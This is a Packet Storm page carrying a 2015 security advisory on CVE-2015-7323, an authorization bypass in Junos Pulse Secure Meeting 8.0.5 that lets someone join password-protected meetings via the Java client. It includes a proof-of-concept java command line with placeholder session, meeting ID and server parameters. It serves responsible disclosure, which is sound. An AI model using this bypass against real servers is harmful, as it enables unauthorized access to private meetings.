exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Junos Pulse Secure Meeting 8.0.5 Access Bypass

Junos Pulse Secure Meeting 8.0.5 Access Bypass
Posted Sep 25, 2015
Authored by Profundis Labs | Site profundis-labs.com

Junos Pulse Secure Meeting version 8.0.5 allows an attacker to enter "secure" meetings without knowledge of the password and the invitation link using the java fat client (meetingAppSun.jar).

tags | exploit, java
advisories | CVE-2015-7323
SHA-256 | 72d0987702534e4b644e0f7014857caa8cdf81f311cef5ea5fd171580871e68d

Junos Pulse Secure Meeting 8.0.5 Access Bypass

Change Mirror Download
Profundis Labs Security Advisory
https://profundis-labs.com/advisories/CVE-2015-7323.txt

Product:
================================
Junos Pulse Secure Meeting

Secure Meeting is a part of the Junos Puls Collaboration software, which
allows you to organize and holding virtual meetings with internal and
external users via the Juniper Access Gateway.

Vulnerability Type:
===================
Insufficient Authorization Checks

CVE Reference:
==============
CVE-2015-7323

VENDOR Reference:
=================
https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA40054

Vulnerability Details:
=====================

It is possible to enter "secure" meetings without knowledge of the password
and the invitation link using the java fat client (meetingAppSun.jar).

To access such meetings the following information is required: - A valid
sessionID (DSID). This sessionID can be obtained by either having an
invitation link to any other meeting or the user has a valid account to log
into junos pulse using the http login form. - The meeting ID The meeting ID
is a 7-8 digits number which may be gained using brute force or via
CVE-2015-7322 (https://profundis-labs.com/advisories/CVE-2015-7322.txt)

Note: The vulnerability is only related to the java fat client. If a user
tries to access a secure meeting using the web browser (
https://domain/dana-na/meeting/login_meeting.cgi?mid=PARAM_A&occurrence=0),
the meeting password (or invitation link) is required.

PoC code(s):
===============
Example how to start the java fat client to access a meeting A from the
command line:
java -classpath
/usr/lib/jvm/java-7-oracle/jre/lib/plugin.jar:~/.juniper_networks/meetingAppSun.jar
SecureMeetingApplication ivehost PARAM_D locale de log_level 1 meeting_type
0 Parameter0
"meeting_id=PARAM_A;user_name=xxx;cert_md5=PARAM_B;ncp_read_timeout=90;password=;meeting_url=;mobile_meeting_url="
uploadlog 1 home_dir "/home/..." user_agent "Mozilla/5.0" neoteris-dsid
"DSID=PARAM_C"

PARAM_A = meeting ID of Meeting A
PARAM_B = md5 hash of the SSL-certifificate of Junos Pulse server
PARAM_C = a valid sessionID
PARAM_D = the domain/IP of the Junos Pulse server

Disclosure Timeline:
=========================================================

Vendor Notification: 01/2015
Vendor Confirmation: 03/2015
Vendor Patch Release: 06/2015
Public Disclosure: 09/2015

Affected Version:
=========================================================
8.0.5

Exploitation Technique:
=======================
Remote

Severity Level:
=========================================================
CVSS Score: 5.0 (AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N)


Login or Register to add favorites

File Archive:

May 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    15 Files
  • 2
    May 2nd
    16 Files
  • 3
    May 3rd
    38 Files
  • 4
    May 4th
    15 Files
  • 5
    May 5th
    35 Files
  • 6
    May 6th
    0 Files
  • 7
    May 7th
    0 Files
  • 8
    May 8th
    8 Files
  • 9
    May 9th
    66 Files
  • 10
    May 10th
    19 Files
  • 11
    May 11th
    27 Files
  • 12
    May 12th
    8 Files
  • 13
    May 13th
    0 Files
  • 14
    May 14th
    1 Files
  • 15
    May 15th
    19 Files
  • 16
    May 16th
    66 Files
  • 17
    May 17th
    28 Files
  • 18
    May 18th
    32 Files
  • 19
    May 19th
    13 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close